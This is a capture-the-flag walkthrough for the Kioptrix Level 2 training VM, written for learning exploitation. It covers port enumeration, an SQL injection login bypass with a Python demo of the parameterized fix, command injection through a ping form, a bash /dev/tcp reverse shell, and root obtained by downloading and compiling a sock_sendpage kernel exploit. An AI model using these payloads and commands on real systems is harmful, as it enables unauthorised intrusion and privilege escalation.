Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

Service Enumeration

Port        Service    Version Detection
TCP 22      ssh        OpenSSH 3.9p1 (protocol 1.99)
TCP 80      http       Apache httpd 2.0.52 ((CentOS))
TCP 111     rpcbind    RPC Bind
TCP 443     https      Apache httpd 2.0.52 ((CentOS))
TCP 631     ipp        CUPS 1.1
TCP 946     -          (no version identified)
TCP 3306    mysql      MySQL (unauthorized)

Web Application Investigation

The web form at /index.php was vulnerable to SQL injection: entering the username admin and the password ' or '1'='1 bypassed authentication.

SQL Injection Auth Bypass

SQL Injection - Why does ' or '1'='1 work ?

The web application builds its query from the form fields, expecting something like: $query = "SELECT * FROM users WHERE username = 'admin' AND password='blah'"; The injected input is placed where blah sits, between the two single quotes, so the resulting query becomes: $query = "SELECT * FROM users WHERE username = 'admin' AND password='' or '1'='1'"; The leading quote of the input closes the (now empty) password string, and '1'='1' is always true, so the WHERE clause matches the admin row and the attacker is authenticated as admin. This input deliberately leaves the query's closing quote in place so the SQL syntax stays valid; alternatively, the rest of the statement can be commented out with: -- -
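To make the mechanism concrete, here is an added Python example (not code from the original writeup or the VM) that reproduces the concatenated query described above against a constructed in-memory SQLite table, then runs the same input through a parameterized query; the users table, its single row and the placeholder password are all constructed for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed demo table with one user row. A real application would store
    # a salted password hash; plaintext is used here only to mirror the query.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'placeholder-password')")
    return conn


def build_vulnerable_query(username, password):
    # Mirrors the page's $query: form input is spliced straight into the SQL
    # text, so a single quote in the input terminates the string literal early.
    return ("SELECT * FROM users WHERE username = '" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn, username, password):
    # True when any row matches, i.e. the login is accepted.
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username, password):
    # The fix: placeholders. The driver binds the values separately from the
    # statement text, so "' or '1'='1" is compared as a literal password value.
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print(build_vulnerable_query("admin", payload))
    print("vulnerable login accepted:", login_vulnerable(db, "admin", payload))
    print("parameterized login accepted:", login_parameterized(db, "admin", payload))
```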

Command Injection

The authentication bypass above exposed a web form vulnerable to command injection: the form's filtering only checks that the ping command is present and does nothing to stop an attacker appending a second command with ; insert-command-here.

Non-privileged shell

A non-privileged reverse shell was obtained using:

ping; bash -i >& /dev/tcp/ 0>&1
[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 32770
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

Local Privilege Escalation

bash-3.00$ uname -ar
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cd /tmp
bash-3.00$ wget --no-check-certificate
           => `9545'
Connecting to||:443... connected.
WARNING: Certificate verification error for unable to get local issuer certificate
WARNING: certificate common name `*' doesn't match requested host name `'.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]

    0K .........                                                30.10 MB/s

02:27:58 (30.10 MB/s) - `9545' saved [9785]

bash-3.00$ mv 9545 sock_sendpage.c
bash-3.00$ gcc -o sock_sendpage sock_sendpage.c
bash-3.00$ ./sock_sendpage
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Thanks for the VM :)